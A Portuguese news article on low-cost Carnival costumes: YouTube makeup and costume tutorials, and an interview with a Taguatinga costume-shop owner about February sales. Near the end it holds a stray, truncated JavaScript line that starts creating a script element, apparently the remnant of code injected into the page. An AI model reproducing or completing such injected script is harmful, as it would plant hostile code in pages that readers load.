Improviso dribla a falta de dinheiro no Carnaval

As folias de Carnaval estão batendo à porta e a festa popular mais feliz do ano merece uma fantasia que a represente. Glitter, tinta, plumas e acessórios diversos ajudam você a compor seu visual na folia. Mas a grana está curta para comprar esses apetrechos? Tem um monte de gente ensinando no YouTube como fazer maquiagens e fantasias criativas e, o melhor, gastando bem pouquinho. Além disso, uma plataforma tem um arsenal de ideias de fantasias para o Carnaval e para que a criatividade aflore, é preciso opções.

Partilha – Blogueiras compartilham suas dicas e ensinam em tutoriais uma forma de fazer a fantasia na pele.

 A maquiadora Juliana Balduino (à esq.) ensina, em seu canal, maquiagens mais sofisticadas para quem prefere algo discreto, mas sem perder o brilho do Carnaval. Franciny Ehlke (ao centro) compartilhou em seu canal no YouTube o tutorial para se fantasiar de unicórnio. Além disso, a blogueira ainda ensinou a fazer uma fantasia improvisada. A Youtuber Mari Maria (à dir.) ensinou, em seu último vídeo de maquiagens de Carnaval, a fazer uma maquiagem de gatinha. Além disso, a ruiva ainda ensinou a confeccionar a tiara que imita as orelhas do animal. Fotos: Reprodução/ Instagram e YouTube.

 

Negócios de Carnaval

Desde 1983, a Catouvi Festas&Fantasias é uma das principais lojas de aluguel de fantasias e acessórios de Taguatinga. A  proprietária da loja, Renata de Paula, afirma que fevereiro é o segundo melhor mês para os negócios, ficando apenas atrás de outubro, mês em que é comemorado o Dia das Bruxas e o Dia das Crianças.

“O carnaval de Brasília está muito forte. Hoje pessoas ficam em Brasília e curtem ficar aqui. Então temos que nos preparar para isso. Nesse período, a loja contrata duas funcionárias temporárias para conseguir concluir a demanda”, conta Renata.

Ela afirma ainda que, por causa dos blocos, os brasilienses investem bastante em acessórios, que vão desde R$ 5 e podem chegar a custar R$ 30. “Os acessórios fazem a cabeça do nosso público. Os bloquinhos pedem fantasias mais descontraídas. Então tiaras, gravatas, óculos são os que mais vendem”, diz.

Para ajudar a compor as fantasias com criatividade, o Pinterest, um site com um catálogo de ideias, tem uma seção especial de Carnaval. Para quem vai cair na folia, boas dicas para curtir melhor ainda esta festa.

Foto: reprodução / Pinterest

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário